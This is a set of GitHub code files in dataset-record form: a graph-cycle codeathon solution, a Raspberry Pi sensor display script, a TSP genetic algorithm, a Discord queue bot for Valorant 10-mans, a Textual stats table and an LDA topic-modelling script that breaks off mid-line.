{i, j}] # Keep track of length and endpoints rather than the whole path\n    else:\n        return deque([i,j]) # Keep the whole list as a deque\n\ndef run_solution(f=stdin, O=DEFAULT_O, npairs=DEFAULT_NPAIRS):\n    \"\"\"\n    Reads file from stdin and outputs the cycle size\n    Optimization levels:\n    0. Naive: builds full graph then checks that all are the same and outputs the size\n    1. Short circuits when a full circuit is completed or a path gets longer than min(k,l)\n    2. Does not build full graphs but rather keeps only endpoints\n    3. 
Keeps a fixed number of paths in memory at a time (default; success not guaranteed but probable)\n    \"\"\"\n    n, k, l = (int(x) for x in next(f).strip().split())\n    if k > l: k, l = l, k # Make sure k <= l\n\n    paths = {} # representative name -> deque of names\n    endpoint_reprs = {} # name -> representative of group\n\n    for i, j in read_input(f):\n        repr_i = endpoint_reprs.get(i, None)\n        repr_j = endpoint_reprs.get(j, None)\n\n        if repr_i is not None and repr_j is not None:\n            # Connect the two endpoint_reprs and merge paths\n            if repr_i == repr_j:\n                # Complete cycle\n                del endpoint_reprs[i]\n                del endpoint_reprs[j]\n\n                if O >= 1:\n                    return path_len(paths[repr_i], O)\n            else:\n                connect(endpoint_reprs, paths, repr_i, repr_j, i, j, O)\n        elif repr_i is not None:\n            # Append {i,j} to the path containing i\n            path = paths[repr_i]\n            append(path, i, j, O)\n            del endpoint_reprs[i]\n            endpoint_reprs[j] = repr_i\n            if O >= 1 and path_len(path, O) > k:\n                return l\n        elif repr_j is not None:\n            # Append {i,j} to the path containing j\n            path = paths[repr_j]\n            append(path, j, i, O)\n            del endpoint_reprs[j]\n            endpoint_reprs[i] = repr_j\n            if O >= 1 and path_len(path, O) > k:\n                return l\n        else:\n            # Neither endpoint has been seen yet so make a new path\n            if O < 3 or len(paths) < npairs:\n                paths[i] = new_path(i, j, O) # Set i as the new path representative\n                endpoint_reprs[i] = endpoint_reprs[j] = i # Link both endpoint_reprs to representative i\n\n    if O >= 3:\n        print(\"ERROR: no solution found\", file=stderr)\n        return k # Guess k\n    else:\n        cycle_size = len(next(iter(paths.values())))\n        assert all(len(path) == cycle_size for path in paths.values())\n\n        return cycle_size\n\ndef main(f=stdin, O=DEFAULT_O, npairs=DEFAULT_NPAIRS):\n    print(run_solution(f=f, O=O, npairs=npairs))\n\nif __name__ == \"__main__\":\n    import argparse\n    argp = argparse.ArgumentParser(description=\"Determines size of cycles within a graph of either all k-cycles or all l-cycles\")\n    argp.add_argument(\"-O\", default=DEFAULT_O, type=int, help=\"Optimization level (default: 3)\")\n    argp.add_argument(\"--pairs\", default=DEFAULT_NPAIRS, type=int, help=\"Number of pairs to keep for -O3\")\n    argv = argp.parse_args()\n    main(O=argv.O, npairs=argv.pairs)\n","repo_name":"justinba1010/USCCodeathon-S21-Upper","sub_path":"gotta-be-faster-than-that/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":5629,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"36978949376","text":"import time\nimport RPi.GPIO as GPIO\nimport Adafruit_GPIO.SPI as SPI\nimport Adafruit_MCP3008\nimport Adafruit_SSD1306\nimport Adafruit_DHT\n\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\n\nSDI = 17\nRCLK = 18\nSRCLK = 27\nRST = 24\nPIN_BUTTON_14 = 14\nPIN_BUTTON_15 = 15\nPIN_BUTTON_4 = 4\nPIN_DHT11 = 22\n\n# Hardware SPI configuration:\nSPI_PORT = 0\nSPI_DEVICE = 0\nmcp = Adafruit_MCP3008.MCP3008(spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE))\ntempSensor = Adafruit_DHT.DHT11\n\ndispLeft = None\ndispRight = None\nbuttonState14 = False\nbuttonState15 = False\nbuttonState4 = False\nfont = ImageFont.load_default()\n\ndef setup():\n    GPIO.setwarnings(False)\n    GPIO.setmode(GPIO.BCM)\n    GPIO.setup(SDI, GPIO.OUT)\n    GPIO.setup(RCLK, GPIO.OUT)\n    GPIO.setup(SRCLK, GPIO.OUT)\n    GPIO.output(SDI, GPIO.LOW)\n    GPIO.output(RCLK, GPIO.LOW)\n    GPIO.output(SRCLK, GPIO.LOW)\n    GPIO.setup(PIN_BUTTON_14, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n    GPIO.setup(PIN_BUTTON_15, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)\n    GPIO.setup(PIN_BUTTON_4, GPIO.IN, 
pull_up_down=GPIO.PUD_DOWN)\n    GPIO.add_event_detect(PIN_BUTTON_15, GPIO.RISING, callback=button_callback)\n    GPIO.add_event_detect(PIN_BUTTON_14, GPIO.RISING, callback=button_callback)\n    GPIO.add_event_detect(PIN_BUTTON_4, GPIO.RISING, callback=button_callback)\n    hc595_in(0)\n    global dispLeft\n    dispLeft = Adafruit_SSD1306.SSD1306_128_64(rst=RST, i2c_address=0x3D)\n    dispLeft.begin()\n    dispLeft.clear()\n    dispLeft.display()\n    global dispRight\n    dispRight = Adafruit_SSD1306.SSD1306_128_64(rst=RST, i2c_address=0x3C)\n    dispRight.begin()\n    dispRight.clear()\n    dispRight.display()\n\ndef hc595_in(dat):\n    # print(dat)\n    for bit in range(0, 20):\n        val = 524288 & (dat << bit)\n        # print(val)\n        GPIO.output(SDI, val)\n        GPIO.output(SRCLK, GPIO.HIGH)\n        time.sleep(0.001)\n        GPIO.output(SRCLK, GPIO.LOW)\n    hc595_out()\n\ndef hc595_out():\n    GPIO.output(RCLK, GPIO.HIGH)\n    time.sleep(0.001)\n    GPIO.output(RCLK, GPIO.LOW)\n\ndef button_callback(channel):\n    print(channel)\n    if channel == 15:\n        global buttonState15\n        buttonState15 = not buttonState15\n        if buttonState15:\n            measurePPM()\n        else:\n            dispLeft.clear()\n            dispLeft.display()\n    elif channel == 14:\n        global buttonState14\n        buttonState14 = not buttonState14\n        if buttonState14:\n            activateBar()\n        else:\n            hc595_in(0)\n    elif channel == 4:\n        global buttonState4\n        buttonState4 = not buttonState4\n        if buttonState4:\n            measureTemp()\n        else:\n            dispRight.clear()\n            dispRight.display()\n    time.sleep(1)\n    \ndef activateBar():\n    values = [0]*2\n    for i in range(2):\n        values[i] = min(int(round(mcp.read_adc(i) / 100)), 10)\n    output = int(values[0] * '1' + (10 - values[0]) * '0' + values[1] * '1' + (10 - values[1]) * '0', 2)\n    hc595_in(output)\n\ndef displayLeft(leftPPM, rightPPM):\n    width = dispLeft.width\n    height = dispLeft.height\n    image = Image.new('1', (width, height))\n    draw = ImageDraw.Draw(image)\n    draw.text((2, 2), leftPPM, font=font, fill=255)\n    draw.text((2, 2+20), rightPPM, font=font, fill=255)\n    dispLeft.image(image)\n    dispLeft.display()\n    \ndef measureTemp():\n    humidity, temperature = Adafruit_DHT.read_retry(tempSensor, PIN_DHT11)\n    if humidity is not None and temperature is not None:\n        displayRight('Temp={0:0.1f}*C'.format(temperature), 'Humidity={0:0.1f}%'.format(humidity))\n    else:\n        measureTemp()\n    \ndef measurePPM():\n    values = [0]*2\n    for i in range(2):\n        values[i] = mcp.read_adc(i)\n    if values[0] is not None and values[1] is not None:\n        displayLeft('PPM_1={0:0.1f} PPM'.format(values[0]), 'PPM_2={0:0.1f} PPM'.format(values[1]))\n    else:\n        measurePPM()\n\ndef displayRight(temp, humidity):\n    width = dispRight.width\n    height = dispRight.height\n    image = Image.new('1', (width, height))\n    draw = ImageDraw.Draw(image)\n    draw.text((2, 2), temp, font=font, fill=255)\n    draw.text((2, 2+20), humidity, font=font, fill=255)\n    dispRight.image(image)\n    dispRight.display()\n    \ndef measureSoil():\n    print(\"Soil \" + str(mcp.read_adc(2)))\n\nprint('Program is running, press Ctrl-C to quit...')\n\n# Main program loop.\ndef loop():\n    while True:\n        measureSoil()\n        time.sleep(1)\n    \ndef destroy():\n    GPIO.cleanup()\n\nif __name__ == '__main__': # Program starting from here\n    setup()\n    try:\n        loop()\n    except KeyboardInterrupt:\n        destroy()\n\n\n","repo_name":"tsvetlin/rpihat","sub_path":"hat.py","file_name":"hat.py","file_ext":"py","file_size_in_byte":4629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10805991745","text":"from ShortestPath.Main import Main\r\nimport random\r\nfrom builtins import 
staticmethod\r\n\r\n\r\n\r\n#filename = \"input_easy.txt\"\r\n#filename = \"input_med.txt\"\r\nfilename = \"input_hard.txt\"\r\nmain = Main(filename)\r\nmain.citireDate()\r\n\r\n\r\nGRAF = main.g\r\nDIM_POPULATIE = main.g.getNrNoduri()\r\n##TARGET = main.drumMinim().get_l()\r\n\r\nCROMOZOMI_CASTIGATORI = 1\r\nTOURNAMENT_SELECTION_SIZE = 3\r\n\r\nRATA_MUTATIE = 0.25\r\n\r\nclass Cromozom:\r\n ''''''\r\n def __init__(self):\r\n self.__individ = [];\r\n \r\n \r\n for i in range(1,DIM_POPULATIE +1):\r\n self.__individ.append(i);\r\n \r\n random.shuffle(self.__individ)\r\n \r\n def set_individ(self,list):\r\n self.__individ = list \r\n \r\n def get_individ(self):\r\n return self.__individ\r\n \r\n \r\n def get_fitness(self):\r\n fitness = 0;\r\n for i in range(0,len(self.__individ)-1):\r\n dist = GRAF.get_distanta(self.__individ[i],self.__individ[i+1])\r\n fitness = fitness + dist\r\n \r\n \r\n dist = GRAF.get_distanta(self.__individ[-1],self.__individ[0])\r\n fitness +=dist\r\n \r\n return fitness\r\n \r\n def __str__(self):\r\n string = \"[\";\r\n for i in self.__individ:\r\n string += str(i) + \" , \"\r\n \r\n string += str(self.__individ[0]) + \"]\"\r\n return string\r\n \r\n \r\n \r\nclass Populatie:\r\n def __init__(self,size):\r\n \r\n self.__cromozomi = [];\r\n for i in range(size):\r\n self.__cromozomi.append(Cromozom())\r\n \r\n \r\n def get_cromozomi(self): \r\n self.__cromozomi.sort(key=lambda x: x.get_fitness(), reverse=False)\r\n return self.__cromozomi\r\n \r\n \r\n\r\nclass AlgEvolutiv:\r\n ''''''\r\n \r\n \r\n \r\n @staticmethod\r\n def evolve_population(populatie):\r\n return AlgEvolutiv.mutate_population(AlgEvolutiv.crossover_population(populatie))\r\n \r\n @staticmethod\r\n def crossover_population(populatie):\r\n crossoverPopulation = Populatie(0)\r\n \r\n for i in range(CROMOZOMI_CASTIGATORI):\r\n crossoverPopulation.get_cromozomi().append(populatie.get_cromozomi()[i])\r\n \r\n i = CROMOZOMI_CASTIGATORI\r\n while i < DIM_POPULATIE:\r\n cromozom1 = AlgEvolutiv.select_tournament_population(populatie).get_cromozomi()[0]\r\n cromozom2 = AlgEvolutiv.select_tournament_population(populatie).get_cromozomi()[0]\r\n crossoverPopulation.get_cromozomi().append(AlgEvolutiv.crossover_chromosomes(cromozom1, cromozom2));\r\n i+=1\r\n \r\n return crossoverPopulation\r\n \r\n @staticmethod\r\n def mutate_population(populatie):\r\n for i in range(CROMOZOMI_CASTIGATORI,DIM_POPULATIE):\r\n AlgEvolutiv.mutate_chromosomes(populatie.get_cromozomi()[i])\r\n \r\n return populatie\r\n \r\n @staticmethod\r\n def crossover_chromosomes(cromozom1,cromozom2):\r\n cromozom_rez = Cromozom()\r\n \r\n lista_perm = [0] * DIM_POPULATIE\r\n \r\n start = random.randint(0,DIM_POPULATIE-1)\r\n stop = random.randint(0,DIM_POPULATIE-1)\r\n \r\n if start == stop:\r\n return cromozom1\r\n \r\n if start > stop:\r\n aux = start\r\n start = stop\r\n stop = aux\r\n \r\n while start <= stop:\r\n lista_perm[start] = cromozom1.get_individ()[start]\r\n start+=1\r\n \r\n \r\n i1 = stop+1\r\n i2 = stop+1\r\n \r\n while 0 in lista_perm:\r\n if i1 == DIM_POPULATIE:\r\n i1 = 0\r\n \r\n if i2 == DIM_POPULATIE:\r\n i2 = 0\r\n \r\n if cromozom2.get_individ()[i2] in lista_perm:\r\n i2 +=1\r\n else:\r\n lista_perm[i1] = cromozom2.get_individ()[i2]\r\n i1+=1\r\n i2+=1\r\n \r\n \r\n cromozom_rez.set_individ(lista_perm)\r\n return cromozom_rez\r\n \r\n @staticmethod\r\n def mutate_chromosomes(cromozom):\r\n for i in range(DIM_POPULATIE):\r\n if random.random() < RATA_MUTATIE:\r\n ind1 = random.randint(0,DIM_POPULATIE-1)\r\n ind2 = 
random.randint(0,DIM_POPULATIE-1)\r\n \r\n aux = cromozom.get_individ()[ind1]\r\n cromozom.get_individ()[ind1] = cromozom.get_individ()[ind2]\r\n cromozom.get_individ()[ind2] = aux\r\n \r\n return\r\n \r\n \r\n @staticmethod\r\n def select_tournament_population(pop):\r\n tournament_pop = Populatie(0)\r\n \r\n for i in range(TOURNAMENT_SELECTION_SIZE):\r\n size = len(pop.get_cromozomi())\r\n tournament_pop.get_cromozomi().append(pop.get_cromozomi()[random.randint(0,size-1)])\r\n \r\n \r\n \r\n return tournament_pop\r\n \r\n \r\n \r\n def __init__(self,nrGeneratii):\r\n populatie = Populatie(8);\r\n\r\n gen = 0\r\n print_populatie(populatie, gen)\r\n \r\n while gen < nrGeneratii:\r\n \r\n populatie = AlgEvolutiv.evolve_population(populatie)\r\n gen+=1\r\n print_populatie(populatie, gen)\r\n\r\n\r\ndef print_populatie(pop,gen_nr):\r\n print(\"\\n.........................\")\r\n print(\"Generation \" + str(gen_nr))\r\n print(\"...........................\")\r\n i = 0\r\n for x in pop.get_cromozomi():\r\n print(\"Cromozomul \" + str(i) + \" : \" + x.__str__() + \" ; FITNESS = \" + str(x.get_fitness()))\r\n i +=1\r\n \r\n \r\n \r\n\r\nstart = AlgEvolutiv(10)\r\n\r\n\r\n \r\n\r\n\r\n\r\n ","repo_name":"LauraDiosan-CS/lab04-gatsp-odrinOp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25237177477","text":"import asyncio\nimport discord\nimport myToken\nimport random\nimport datetime\nfrom datetime import datetime\n \nfrom discord.ext import commands\nfrom discord.ext.commands import Cog, BucketType\nfrom discord.ext.commands import bot\nfrom discord.ext.commands import (command, cooldown, CommandOnCooldown)\n \n \n# loads of vars we'll need to persist\nbot = commands.Bot(command_prefix=myToken.prefix,\n description=myToken.description)\n \n@bot.event\nasync def on_ready():\n await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.playing, name=\"#support to join 10mans\"))\n print(\"Bot is online and working somewhat\")\n \nourServer = None\ninProgress = False\nqueueUsers = []\nfirstCaptain = None\nsecondCaptain = None\nteamOne = []\nteamTwo = []\ncurrentPickingCaptain = \"\"\npickNum = 1\nteam1ChannelId = 698323152836493312\nteam2ChannelId = 698323212773228584\nlastGameChannelId = 824104178175180830\nserverName = myToken.guildID\n\n \n# Split logger to log to console and file\nimport logging\nlogging.basicConfig(level=logging.INFO)\nlogFormatter = logging.Formatter(\"%(asctime)s [%(threadName)-12.12s] [%(levelname)-5.5s] %(message)s\")\nrootLogger = logging.getLogger()\n\nfileHandler = logging.FileHandler(\"logs.log\")\nfileHandler.setFormatter(logFormatter)\nrootLogger.addHandler(fileHandler)\n\n# Vice ids\nqueue_na_role_id = 700235039161581619\nqueue_eu_role_id = 820818871812489236\nlastgame_role_id = 719625580596691054\nlastgame_role_ready_id = 719625720581718055\ntenman_role_id = 796195408920444951\ncaptain_role_id = 698343215119597669\nqueue_na_id = 698323056484941914\nqueue_eu_id = 822288145374511114\nqueue_last_id = 824104178175180830\nqueue_teams_ids = [698323152836493312, 698323212773228584,\n 820097295209988098, 820097306488733717]\nchannel_id = 698328368676077698\n\n\n\n\n\n@bot.event\nasync def on_voice_state_update(member, before, after):\n\n # Member joined a channel\n if before.channel is None and after.channel is not None:\n\n # Queue #1\n if after.channel.id == queue_na_id:\n await check_ready(member, 
queue_na_role_id, after)\n\n # Queue #2\n elif after.channel.id == queue_eu_id:\n await check_ready(member, queue_eu_role_id, after)\n\n # Queue teams\n elif after.channel.id in queue_teams_ids:\n await add_role(member, lastgame_role_ready_id)\n\n # Queue last\n elif after.channel.id == queue_last_id:\n await check_ready(member, lastgame_role_ready_id, after)\n\n # Member left a channel\n elif before.channel is not None and after.channel is None:\n\n # Queue #1\n if before.channel.id == queue_na_id:\n await remove_role(member, queue_na_role_id)\n\n # Queue #2\n elif before.channel.id == queue_eu_id:\n await remove_role(member, queue_eu_role_id)\n\n # Queue teams\n elif before.channel.id in queue_teams_ids:\n await remove_role(member, lastgame_role_id)\n\n # Queue last\n elif before.channel.id == queue_last_id:\n await remove_role(member, lastgame_role_ready_id)\n\n # Member switched channels\n elif before.channel.id != after.channel.id:\n\n # Left queue #1\n if before.channel.id == queue_na_id:\n await remove_role(member, queue_na_role_id)\n\n # Left queue #2\n elif before.channel.id == queue_eu_id:\n await remove_role(member, queue_eu_role_id)\n\n # Left queue last\n elif before.channel.id == queue_last_id:\n await remove_role(member, lastgame_role_ready_id)\n\n # Left queue teams\n elif before.channel.id in queue_teams_ids:\n await remove_role(member, lastgame_role_id)\n\n # Joined queue #1\n if after.channel.id == queue_na_id:\n await check_ready(member, queue_na_role_id, after)\n\n # Joined queue #2\n elif after.channel.id == queue_eu_id:\n await check_ready(member, queue_eu_role_id, after)\n\n # Joined queue teams\n elif after.channel.id in queue_teams_ids:\n await add_role(member, lastgame_role_id)\n\n # Joined queue last\n if after.channel.id == queue_last_id:\n await check_ready(member, lastgame_role_ready_id, after)\n\n\ndef get_role(member, role_id):\n return discord.utils.get(member.guild.roles, id=role_id)\n\n\ndef member_name(member):\n return f'{member.nick} - {member.mention}'\n\n\nasync def remove_role(member, role_id):\n logging.info(f'Attempting to remove role \\\"{role_id}\\\" from member \\\"{member_name(member)}\\\"')\n role = get_role(member, role_id)\n await member.remove_roles(role)\n\n\nasync def add_role(member, role_id):\n logging.info(f'Attempting to add role \\\"{role_id}\\\" to member \\\"{member_name(member)}\\\"')\n role = get_role(member, role_id)\n await member.add_roles(role)\n\n\nasync def check_ready(member, role_id, after):\n logging.info(f'Member \\\"{member_name(member)}\\\" joined queue: \\\"{after.channel.name}\\\"')\n role = get_role(member, role_id)\n await member.add_roles(role)\n\n if len(after.channel.members) == after.channel.user_limit:\n captains = await choose_captains(role, after)\n\n channel = bot.get_channel(channel_id)\n bot_avatar = bot.user.avatar_url\n embed = discord.Embed()\n embed.set_thumbnail(url=bot_avatar)\n embed.add_field(name=\"**Queue Filled**\",\n value=f'<#{after.channel.id}> has reached 10 players. 
Captains will start the picking process.',\n                        inline=False)\n        embed.add_field(name=\"**Captains**\", value=f'{captains[0].mention} and {captains[1].mention}', inline=False)\n\n        if random.randint(0, 1):\n            captains.reverse()\n        \n        embed.add_field(name=\"**Captain Selections**\",\n                        value=f'{captains[0].mention} has been chosen for first pick and will add players to join the party.\\n{captains[1].mention} has been chosen for map pick and side pick.',\n                        inline=False)\n        embed.set_footer(text='Vice Valorant 10mans/Scrims', icon_url=bot_avatar)\n        embed.color = (0xFEE354)\n        await channel.send(content=f'{role.mention}', embed=embed)\n\n\nasync def choose_captains(role, after):\n    logging.info(f'Attempting to choose captains from the members of the role \\\"{role.id}\\\"')\n    channel = getattr(after, 'channel', after)  # accept either a VoiceState or a voice channel (qstart passes the channel itself)\n    members = channel.members\n    # members_copy = list(members)\n    # captain_roles = []\n    # for member in members:\n    #     if any([captain_role_id == x.id for x in member.roles]):\n    #         captain_roles.append(member)\n    #         members_copy.remove(member)\n\n    # num_captains = len(captain_roles)\n    # if num_captains == 0:\n    #     return random.sample(members, 2)\n    # elif num_captains == 1:\n    #     captains = list(captain_roles)\n    #     captains.append(random.choice(members_copy))\n    #     return captains\n    # else:\n    return random.sample(members, 2)\n\n@bot.command()\n@commands.has_role('Hosts')\nasync def qstart(ctx):\n    channel = bot.get_channel(lastGameChannelId)\n    role = discord.utils.find(lambda r: r.name == 'lastgame', ctx.message.guild.roles)\n    \n    if len(channel.members) == channel.user_limit:\n        captains = await choose_captains(role, channel)\n        \n        bot_avatar = bot.user.avatar_url\n        embed = discord.Embed()\n        embed.set_thumbnail(url=bot_avatar)\n        embed.add_field(name=\"**Queue Filled**\",\n                        value=f'{channel.name} has reached 10 players. 
Captains will start adding players on VALORANT to fill the party.',\n inline=False)\n embed.add_field(name=\"**Captains**\", value=f'{captains[0].mention} and {captains[1].mention}', inline=False)\n \n if random.randint(0, 1):\n captains.reverse()\n \n embed.add_field(name=\"**Captain Selections**\",\n value=f'{captains[0].mention} has been chosen for first pick and will add players to join the party.\\n{captains[1].mention} has been chosen for map and side.',\n inline=False)\n embed.set_footer(text='Vice Valorant 10mans/Scrims', icon_url=bot_avatar)\n embed.color = (0xF8C300)\n await ctx.send(content=f'{role.mention}', embed=embed)\n else:\n await ctx.send('no')\n\nasync def on_ready(ctx ,members, message):\n\n voice_channel = ctx.guild.get_channel(699429428035321927)\n members = voice_channel.members #finds members connected to the channel\n\n memids = [] #(list)\n for member in members:\n memids.append(member.id)\n\n@bot.command()\nasync def test2(message, memids):\n if \"wow\" in message.content:\n await message.send(memids)\n\n\nbot.run(myToken.token)","repo_name":"graeeee/testing123","sub_path":"vicebot.py","file_name":"vicebot.py","file_ext":"py","file_size_in_byte":8885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70249367149","text":"from __future__ import annotations\r\nfrom textual.app import ComposeResult\r\nfrom typing import Tuple\r\nfrom textual.widgets import DataTable, Static\r\n\r\nCOLUMNS_DEFINITION = [\r\n (\"Name\", 33),\r\n (\"Kit\", 8),\r\n (\"Weapon\", 8),\r\n (\"Health\", 7), \r\n (\"Helmet\", 6), \r\n (\"Money\", 13), \r\n (\"K\", 5), \r\n (\"A\", 5), \r\n (\"D\", 5), \r\n (\"ADR\", 6),\r\n]\r\n\r\nclass PlayerStat:\r\n def __init__(self, name, has_kit, weapon, health, has_helmet, money, k, a, d, adr):\r\n self.name = name\r\n self.has_kit = has_kit\r\n self.weapon = weapon\r\n self.health = health\r\n self.has_helmet = has_helmet\r\n self.money = money\r\n self.k = k\r\n self.a = a\r\n self.d = d\r\n self.adr = adr\r\n \r\n def to_row(self) -> Tuple:\r\n return (\r\n self.name, \r\n \"V\" if self.has_kit else \"X\",\r\n self.weapon, \r\n self.health, \r\n \"V\" if self.has_helmet else \"X\", \r\n self.money, \r\n self.k, self.a, self.d, self.adr\r\n )\r\n \r\n @staticmethod\r\n def from_dict(data):\r\n return PlayerStat(\r\n data['name'],\r\n False if not('hasDefuseKit' in data) else data['hasDefuseKit'],\r\n 'AK',\r\n data['hp'],\r\n data['helmet'],\r\n data['money'],\r\n data['score'],\r\n data['assists'],\r\n data['deaths'],\r\n data['damagePrRound']\r\n )\r\n \r\n\r\nclass TeamStats(Static):\r\n def __init__(self, stats:list[PlayerStat], id:str):\r\n Static.__init__(self)\r\n self.custom_stats = stats\r\n self.id = id\r\n\r\n def compose(self) -> ComposeResult:\r\n yield DataTable(show_cursor=False)\r\n\r\n def on_mount(self) -> None:\r\n table = self.query_one(DataTable)\r\n for column in COLUMNS_DEFINITION:\r\n table.add_column(column[0], width=column[1])\r\n self.update_data(self.custom_stats)\r\n\r\n def update_data(self, data:list[PlayerStat]):\r\n table = self.query_one(DataTable)\r\n table.clear()\r\n table.add_rows(map(lambda entry : entry.to_row(), data))","repo_name":"ArthurAttout/HLTV-Textual","sub_path":"TeamStats.py","file_name":"TeamStats.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72097347628","text":"from i_vectorizer import GensimVectorizer_Topic_Discovery\nimport 
pickle\nfrom gensim.models import LdaModel\nimport pandas as pd\nimport bs4\nfrom b_sqlite_operation import SqliteOperation\nimport xlwings\nimport time\nfrom h_readsqlite import load_from_pickle, save_to_pickle\nfrom h_readsqlite import create_faulty_dict, create_total_index, create_existing_data_index\n\n# The purpose of this script is to get the data from existing LDA model. \n# The retreived data will be used for further analysis.\n\n# The index for existing data is necessary before executing this script.\n# To get the index, go back to h_readsqlite.py and execute:\n# 1. create_total_index 2. create_faulty_dict 3. create_existing_data_index\n# 4. Save it in pickle 5. Show in Table.\n\n#!!! This code needs to be executed once, because the result as Dataframe \n# & pickle is saved under DF_DOMINANT_TOPIC_PATH and can be called\n# multiple times by:\n# a = load_from_pickle(DF_DOMINANT_TOPIC_PATH)\n# b = xlwings.view(a.head(100))\n\n\nDB_PATH = \"DB/StackOverflow.sqlite\"\nLEXICON_PATH = \"other/model_2012-2021_1/lexicon.pkl\"\nDOCMATRIX_PATH = \"other/model_2012-2021_1/doc_matrix.pickle\"\nMODEL_PATH = \"other/model_2012-2021_1/LDA_model_6_topics\"\nSTART_YEAR = 2012\nEND_YEAR = 2021\nLIMIT = None\n\nFOLDER_PATH = \"other/model_2012-2021_1/index\"\nFAULTY_FILE_NAME = \"faulty_data_index\"\nTOTAL_FILE_NAME = \"total_data_index\"\nEXISTING_INDEX_PATH = \"existing_data_index\"\n\nDF_DOMINANT_TOPIC_PATH = \"other/model_2012-2021_1/index/df_dominant_topic.pickle\"\n\ntotal_path = \"{}/{}.pickle\".format(FOLDER_PATH, TOTAL_FILE_NAME)\n# \"other/model_2012-2021_1/index/total_data_index.pickle\"\nfaulty_path = \"{}/{}.pickle\".format(FOLDER_PATH, FAULTY_FILE_NAME)\n# \"other/model_2012-2021_1/index/faulty_data_index.pickle\"\nexisting_index_path = \"{}/{}.pickle\".format(FOLDER_PATH, EXISTING_INDEX_PATH)\n# \"other/model_2012-2021_1/index/existing_data_index.pickle\"\n\n### 0. Initialization:\ndef initialization():\n # a. create faulty_dict b. create total_index \n # c. remove faulty_index from total_index (using result from a and b)\n # This step is necessary before executing further codes.\n # Necessary because not all documents from DB can be parsed into string, \n # therefore some documents with errors were skipped. Therefore the \n # id sequence is messed up, due to some missing docs (0.02%)\n start_time = time.time()\n # Create dict containing docs that can't be parsed:\n create_faulty_dict(DB_PATH, FOLDER_PATH, FAULTY_FILE_NAME)\n # Get the id of all docs:\n create_total_index(DB_PATH, FOLDER_PATH, TOTAL_FILE_NAME)\n # Remove the faulty index (stored in faulty_dict) from total_index and saved\n # in existing_data_index.pickle\n create_existing_data_index(total_path, faulty_path, existing_index_path)\n a = load_from_pickle(total_path)\n b = load_from_pickle(faulty_path)\n c = load_from_pickle(existing_index_path)\n\n for i in list(a.keys()):\n print(\"Year {}: {}\".format(i, len(a[i])-len(b[i])==len(c[i])))\n print(len(a[i]), len(b[i]), len(c[i]))\n end_time = time.time()\n print(\"Duration: {} seconds\".format(round(end_time-start_time, 2)))\n return\n\n# initialization()\n\n### 1. Loading Lexicon\nprint(\"Read Gensim Dictionary / Lexicon\")\nvectorizer = GensimVectorizer_Topic_Discovery(LEXICON_PATH)\nprint(vectorizer.id2word.token2id)\nprint(\"Finish reading Gensim Dictionary\")\n\n### 2. Loading Doc Matrix\nprint(\"Start reading Doc Matrix / Corpus\")\ndocmatrix = None\nwith open(DOCMATRIX_PATH, \"rb\") as f:\n docmatrix = pickle.load(f)\nprint(\"Finish reading DocMatrix.\")\n\n### 3. 
Loading LDA model\nprint(\"Loading LDA model\")\nldamodel = LdaModel.load(MODEL_PATH)\nprint(\"Finish reading LDA transformer.\")\n\n### 4. Getting corpus texts from DB\nprint(\"Getting corpus texts\")\nbase_query = \"\"\"\n    SELECT preprocessed_datas.id, preprocessed_datas.content\n    from preprocessed_datas\n    JOIN raw_datas\n    ON raw_datas.id = preprocessed_datas.id\n    WHERE substr(raw_datas.creation_date, 1, 4) = \"{}\"\n\"\"\"\n# db_handle = SqliteCorpusReader(DB_PATH)\ndb_obj = SqliteOperation(DB_PATH)\nid_doc_list = []\nfor year in range(START_YEAR, END_YEAR+1):\n    print(\"Reading corpus from Y{}\".format(year))\n    current_query = base_query.format(str(year))\n    # docs = db_handle.docs(year, limit=LIMIT)\n    db_obj.execute_query(current_query)\n    docs = list(db_obj.last_cursor)\n    id_doc_list += list(docs)\nprint(\"Removing tags\")\nid_list, doc_list = [], []\nfor id, doc in id_doc_list:\n    id_list.append(id)\n    doc_str = bs4.BeautifulSoup(doc, 'lxml').text\n    doc_list.append(doc_str)\nid_doc_list = None # Erase unnecessary data from memory\nprint(\"Finish reading DB\")\n\n### 5. Creating human-readable table\nprint(\"Getting topics\")\ndef format_topics_sentences(ldamodel, corpus, docs, limit:int=None):\n    # Init output\n    sent_topics_df = pd.DataFrame()\n    if limit is None:\n        targetCorpus = corpus\n    else:\n        targetCorpus = corpus[:limit]\n    # Get main topic in each document\n    for i, row in enumerate(ldamodel[targetCorpus]):\n        row = sorted(row, key=lambda x: (x[1]), reverse=True)\n        # Get the Dominant topic, Perc Contribution and Keywords for each document\n        for j, (topic_num, prop_topic) in enumerate(row):\n            if j == 0:  # => dominant topic\n                wp = ldamodel.show_topic(topic_num)\n                topic_keywords = \", \".join([word for word, prop in wp])\n                sent_topics_df = sent_topics_df.append(pd.Series([int(topic_num), round(prop_topic,4), topic_keywords]), ignore_index=True)\n            else:\n                break\n    sent_topics_df.columns = ['Dominant_Topic', 'Perc_Contribution', 'Topic_Keywords']\n\n    # Add original text to the end of the output\n    contents = pd.Series(docs)\n    sent_topics_df = pd.concat([sent_topics_df, contents], axis=1)\n    sent_topics_df.reset_index(inplace=True)\n    sent_topics_df.columns = ['Document_No', 'Dominant_Topic', 'Topic_Perc_Contrib', 'Keywords', 'Text']\n    return sent_topics_df\n\n# 6. To get the correct Document ID under column Document_No execute:\nexisting_index = load_from_pickle(existing_index_path)\nrelevant_index = []\nfor year in range(START_YEAR, END_YEAR+1):\n    relevant_index.extend(existing_index[year])\n\n# 7. Generate relevant doc_list and exclude the 841 unparseable data:\na = load_from_pickle(total_path)\nb = load_from_pickle(faulty_path)\nlist_a, 